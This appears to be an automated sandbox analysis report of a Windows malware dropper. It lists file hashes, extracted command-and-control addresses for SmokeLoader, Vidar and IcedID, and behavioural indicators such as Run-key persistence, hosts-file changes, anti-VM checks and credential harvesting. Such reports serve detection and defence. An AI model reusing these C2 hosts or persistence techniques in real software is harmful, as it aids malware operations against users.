Resubmissions
Submitted          ID                  Score
23-10-2021 15:52   211023-tbkbesdcfm   10
22-10-2021 17:40   211022-v8trsscggr   10
22-10-2021 15:55   211022-tc9ygacgan   10
22-10-2021 14:38   211022-rz1bfabgb8   10

Analysis
max time kernel: 2710s
max time network: 2716s
platform: windows11_x64
resource: win11
submitted: 22-10-2021 15:55
Static task: static1

Behavioral tasks
behavioral1: sample Fri051e1e7444.exe, resource win7-ja-20210920
behavioral2: sample Fri051e1e7444.exe, resource win7-en-20211014
behavioral3: sample Fri051e1e7444.exe, resource win7-de-20210920
behavioral4: sample Fri051e1e7444.exe, resource win11
behavioral5: sample Fri051e1e7444.exe, resource win10-ja-20211014
behavioral6: sample Fri051e1e7444.exe, resource win10-en-20210920
behavioral7: sample Fri051e1e7444.exe, resource win10-de-20211014
General
Target: Fri051e1e7444.exe
Size: 403KB
MD5: b4c503088928eef0e973a269f66a0dd2
SHA1: eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256: 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512: c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config

Extracted: smokeloader
Version: 2020
C2: http://gejajoo7.top/
C2: http://sysaheu9.top/

Extracted: vidar
Version: 41.5
Botnet: 921
C2: https://mas.to/@xeroxxx
profile_id: 921

Extracted: icedid
Campaign: 1875681804
C2: enticationmetho.ink
Signatures

Process spawned unexpected child process (14 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1452 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5464 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2796 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2084 | 4936 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4804 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5400 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1428 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4548 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6244 | 4936 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 7504 | 4936 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8240 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8436 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8500 | 4936 | schtasks.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8676 | 4936 | schtasks.exe |
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (2 IoCs)
Processes:
resource | yara_rule
behavioral4/memory/5380-334-0x0000000000000000-mapping.dmp | family_redline
behavioral4/memory/5380-335-0x0000000000400000-0x000000000043C000-memory.dmp | family_redline
Registers COM server for autorun (1 TTPs)

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
Processes:
resource | yara_rule
C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe | family_socelars
C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe | family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess (17 IoCs)
Processes:
description | pid | process | target process
PID 4068 created 2840 | 4068 | WerFault.exe | Vo5pWC9v4LM4GIuQjsgwgSyb.exe
PID 860 created 1888 | 860 | WerFault.exe | ZPIklAxPB6jR82sYubVd1wws.exe
PID 3316 created 2744 | 3316 | WerFault.exe | iWl5YE6jVqxWhmGtApNhDm2L.exe
PID 4516 created 2912 | 4516 | WerFault.exe | 0MCyp39H8AxiYTlGcyBfNoUC.exe
PID 5600 created 3324 | 5600 | WerFault.exe | KtMfKMTyGhGITYlVicMT552T.exe
PID 5264 created 1320 | 5264 | WerFault.exe | far1gFrhm6HTCSwt7AdHUaXK.exe
PID 1668 created 1656 | 1668 | WerFault.exe | YkJJP9hUDzrPj8CaQUtFkm4K.exe
PID 1524 created 3004 | 1524 | WerFault.exe | 6VJcPvgbLTEnL3gyVOmcMDK4.exe
PID 1544 created 4964 | 1544 | WerFault.exe | rundll32.exe
PID 4676 created 5720 | 4676 | WerFault.exe | 981C.exe
PID 2716 created 3964 | 2716 | WerFault.exe | E7C5.exe
PID 4500 created 13216 | 4500 | WerFault.exe | GcleanerEU.exe
PID 1848 created 2464 | 1848 | GcleanerEU.exe |
PID 2044 created 4288 | 2044 | WerFault.exe | gcleaner.exe
PID 6192 created 4120 | 6192 | WerFault.exe | gcleaner.exe
PID 6304 created 6264 | 6304 | WerFault.exe | rundll32.exe
PID 7696 created 7584 | 7696 | WerFault.exe | rundll32.exe
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
Processes:
description | pid | process | target process
PID 6460 created 6424 | 6460 | regsvr32.exe | msedge.exe
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/Kelihos.F exe Download 2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
Checks for common network interception software (1 TTPs)
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (5 IoCs)
Processes:
resource | yara_rule
behavioral4/memory/1888-209-0x0000000000E80000-0x0000000000F56000-memory.dmp | family_vidar
behavioral4/memory/2912-238-0x0000000000E20000-0x0000000000EF6000-memory.dmp | family_vidar
behavioral4/memory/1540-268-0x000000001CCA0000-0x000000001CD78000-memory.dmp | family_vidar
C:\Users\Admin\AppData\Local\Temp\build.exe | family_vidar
C:\Users\Admin\AppData\Local\Temp\build.exe | family_vidar
Blocklisted process makes network request (40 IoCs)
Processes:
Downloads MZ/PE file

Drops file in Drivers directory (2 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | DYbALA.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | WerFault.exe
Executes dropped EXE (64 IoCs)
Processes:
Modifies Installed Components in the registry (2 TTPs)

Modifies Windows Firewall (1 TTPs)

Sets file execution options in registry (2 TTPs)

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe | upx
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe | upx
Checks BIOS information in registry (2 TTPs, 24 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
Identifies Wine through registry keys (2 TTPs, 4 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine | msedge.exe
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Wine | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Loads dropped DLL (64 IoCs)
Processes:
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
C:\Users\Admin\Pictures\Adobe Films\5VZS13s3WByVbE4ADMVZQJD5.exe | themida
C:\Users\Admin\Pictures\Adobe Films\nGKKAdD43ozQJDv8K6QWTxN0.exe | themida
C:\Users\Admin\Pictures\Adobe Films\_HVkO6KridfpAFsxSd4xBRC_.exe | themida
behavioral4/memory/3196-286-0x00000000000D0000-0x00000000000D1000-memory.dmp | themida
behavioral4/memory/1672-281-0x0000000000130000-0x0000000000131000-memory.dmp | themida
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 19 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 5077839.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\System32\\dot3gpui\\conhost.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Public\\Documents\\My Pictures\\WmiPrvSE.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Recovery\\WindowsRE\\msedge.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\Downloaded Program Files\\winlogon.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | setup.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Jashihodehy.exe\"" | DYbALA.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\System32\\qcap\\fontdrvhost.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\CoreUIComponents\\dllhost.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Windows\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\\AppxSignature\\StartMenuExperienceHost.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\SysWOW64\\KBDINBE2\\cmd.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sppsvc.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\PowerControl\\Dushuxarocae.exe\"" | WerFault.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\System32\\msdxm\\winlogon.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\foldershare = "\"C:\\Program Files\\Windows Media Player\\QVDBDFUGTJ\\foldershare\\foldershare.exe\"" | 4svaL_6jcYHnI8EWxQv_ARQo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" | setup.exe
Checks for any installed AV software in registry (1 TTPs, 2 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe
Key opened | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab | powershell.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 5VZS13s3WByVbE4ADMVZQJD5.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 1380456.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 8292732.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | svchost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | _HVkO6KridfpAFsxSd4xBRC_.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 808C.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | oRqxkgsixdTQLGlCw_wScXlE.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | nGKKAdD43ozQJDv8K6QWTxN0.exe
Enumerates connected drives (3 TTPs, 64 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Installs/modifies Browser Helper Object (2 TTPs)
BHOs are DLL modules which act as plugins for Internet Explorer.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (6 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
67 | ipinfo.io
108 | ipinfo.io
128 | ipinfo.io
1 | ipinfo.io
26 | ipinfo.io
57 | ip-api.com
Drops file in System32 directory (21 IoCs)
Processes:
description | ioc | process
File created | C:\Windows\SysWOW64\msdxm\winlogon.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File created | C:\Windows\SysWOW64\KBDINBE2\ebf1f9fa8afd6d1932bd65bc4cc3af89a4c8e228 | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\SysWOW64\msdxm\cc11b995f2a76da408ea6a601e682e64743153ad | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\SysWOW64\qcap\fontdrvhost.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\SysWOW64\CoreUIComponents\dllhost.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\SysWOW64\qcap\5b884080fd4f94e2695da25c503f9e33b9605b83 | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File created | C:\Windows\SysWOW64\dot3gpui\conhost.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File opened for modification | C:\Windows\SysWOW64\dot3gpui\conhost.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\SysWOW64\dot3gpui\088424020bedd6b28ac7fd22ee35dcd7322895ce | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\SysWOW64\KBDINBE2\cmd.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk | setup.exe
File opened for modification | C:\Windows\SysWOW64\msdxm\winlogon.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\SysWOW64\CoreUIComponents\5940a34987c99120d96dace90a3f93f329dcad63 | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (10 IoCs)
Processes:
pid | process
3196 | nGKKAdD43ozQJDv8K6QWTxN0.exe
1672 | 5VZS13s3WByVbE4ADMVZQJD5.exe
1904 | 4svaL_6jcYHnI8EWxQv_ARQo.exe
5144 | 1380456.exe
2668 | 8292732.exe
4044 | _HVkO6KridfpAFsxSd4xBRC_.exe
5104 | 808C.exe
1236 | 4svaL_6jcYHnI8EWxQv_ARQo.exe
3696 | 4svaL_6jcYHnI8EWxQv_ARQo.exe
9532 | msedge.exe
Suspicious use of SetThreadContext (7 IoCs)
Processes:
description | pid | process | target process
PID 1976 set thread context of 3324 | 1976 | KtMfKMTyGhGITYlVicMT552T.exe | KtMfKMTyGhGITYlVicMT552T.exe
PID 4388 set thread context of 3076 | 4388 | G51K2QNgA1moFPDcsqFsEuBz.exe | G51K2QNgA1moFPDcsqFsEuBz.exe
PID 4276 set thread context of 5380 | 4276 | _v1u23KhcxVvki0UuinAXhKa.exe | _v1u23KhcxVvki0UuinAXhKa.exe
PID 3128 set thread context of 1844 | 3128 | 1435.exe | 1435.exe
PID 3168 set thread context of 1040 | 3168 | cmd.exe | 5igv91LvXCMygMPp1mBVXES6.exe
PID 3964 set thread context of 4640 | 3964 | E7C5.exe | AppLaunch.exe
PID 6460 set thread context of 10488 | 6460 | regsvr32.exe | msedge.exe
Drops file in Program Files directory (64 IoCs)
Processes:
setup.exe, setup.exe, KzQ4K19_9XrJ2mdTwpnysCw4.exe, autosubplayer.exe, MicrosoftEdgeUpdateSetup_X86_1.3.153.47.exe, MicrosoftEdgeUpdateSetup.exe, autosubplayer.exe, data_load.exe, elevation_service.exe
description | ioc | process
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\MLModels\autofill_labeling_email.ort | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Trust Protection Lists\Mu\Advertising | setup.exe
File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | KzQ4K19_9XrJ2mdTwpnysCw4.exe
File created | C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll | autosubplayer.exe
File created | C:\Program Files (x86)\Microsoft\Temp\EU971D.tmp\msedgeupdate.dll | MicrosoftEdgeUpdateSetup_X86_1.3.153.47.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\zh-TW.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\et.pak | setup.exe
File created | C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll | autosubplayer.exe
File created | C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_lt.dll | MicrosoftEdgeUpdateSetup.exe
File created | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\fr-CA.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\es.pak | setup.exe
File created | C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_it.dll | MicrosoftEdgeUpdateSetup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\wns_push_client.dll | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\Locales\ar.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\Locales\nn.pak | setup.exe
File created | C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png | autosubplayer.exe
File opened for modification | C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll | autosubplayer.exe
File opened for modification | C:\Program Files\temp_files\MLCgSySS.dll | data_load.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\msedgerecovery.exe | elevation_service.exe
File created | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Trust Protection Lists\Mu\Advertising | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\sr.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\pwahelper.exe | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Trust Protection Lists\Sigma\Fingerprinting | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\VisualElements\SmallLogoCanary.png | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\mr.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\Trust Protection Lists\manifest.json | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\Locales\sq.pak | setup.exe
File created | C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll | autosubplayer.exe
File created | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\sr-Latn-RS.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\en-US.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\VisualElements\SmallLogoCanary.png | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\VisualElements\LogoCanary.png | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\sr-Latn-RS.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\bs.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\cy.pak | setup.exe
File opened for modification | C:\Program Files (x86)\lighteningplayer\libvlccore.dll | autosubplayer.exe
File opened for modification | C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll | autosubplayer.exe
File created | C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_mt.dll | MicrosoftEdgeUpdateSetup.exe
File created | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\sk.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\ne.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\qu.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\msedgewebview2.exe.sig | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\lo.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\tt.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\identity_proxy\identity_helper.Sparse.Beta.msix | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\VisualElements\SmallLogoBeta.png | setup.exe
File created | C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll | autosubplayer.exe
File created | C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_el.dll | MicrosoftEdgeUpdateSetup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\en-US.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\ja.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\learning_tools.dll | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Notifications\SoftLandingAssetLight.gif | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\d3dcompiler_47.dll | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\kok.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.50\Locales\ca-Es-VALENCIA.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\wns_push_client.dll | setup.exe
File opened for modification | C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac | autosubplayer.exe
File created | C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_ar.dll | MicrosoftEdgeUpdateSetup.exe
File created | C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_en.dll | MicrosoftEdgeUpdateSetup.exe
File created | C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\msedgeupdateres_id.dll | MicrosoftEdgeUpdateSetup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\af.pak | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\identity_proxy\stable.identity_helper.exe.manifest | setup.exe
File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\94.0.992.50\msedge_100_percent.pak | setup.exe
File created | C:\Program Files (x86)\Microsoft\EdgeCore\94.0.992.50\Locales\ca.pak | setup.exe
-
Drops file in Windows directory 39 IoCs
Processes:
msiexec.exe, rundll32.exe, svchost.exe, rundll32.exe, 4svaL_6jcYHnI8EWxQv_ARQo.exe, MsiExec.exe, 4svaL_6jcYHnI8EWxQv_ARQo.exe, oRqxkgsixdTQLGlCw_wScXlE.exe, svchost.exe, svchost.exe
description | ioc | process
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Tasks\MLCgSySS.job | rundll32.exe
File opened for modification | C:\Windows\Tasks\SA.DAT | svchost.exe
File opened for modification | C:\Windows\Installer\f7710a1.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI3C95.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI7727.tmp | msiexec.exe
File created | C:\Windows\Tasks\MLCgSySS.job | rundll32.exe
File created | C:\Windows\SystemTemp\~DFF97C4367880C56D3.TMP | msiexec.exe
File created | C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI66A7.tmp | msiexec.exe
File created | C:\Windows\SystemTemp\~DF4E84F4DD8BE3E15A.TMP | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI415A.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI44E5.tmp | msiexec.exe
File created | C:\Windows\Downloaded Program Files\cc11b995f2a76da408ea6a601e682e64743153ad | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File opened for modification | C:\Windows\Installer\MSI3EC8.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\Tasks\AdvancedWindowsManager #1.job | MsiExec.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AppxSignature\StartMenuExperienceHost.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AppxSignature\55b276f4edf653fe07efe8f1ecc32d3d195abd16 | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File opened for modification | C:\Windows\Installer\MSI47B5.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6F93.tmp | msiexec.exe
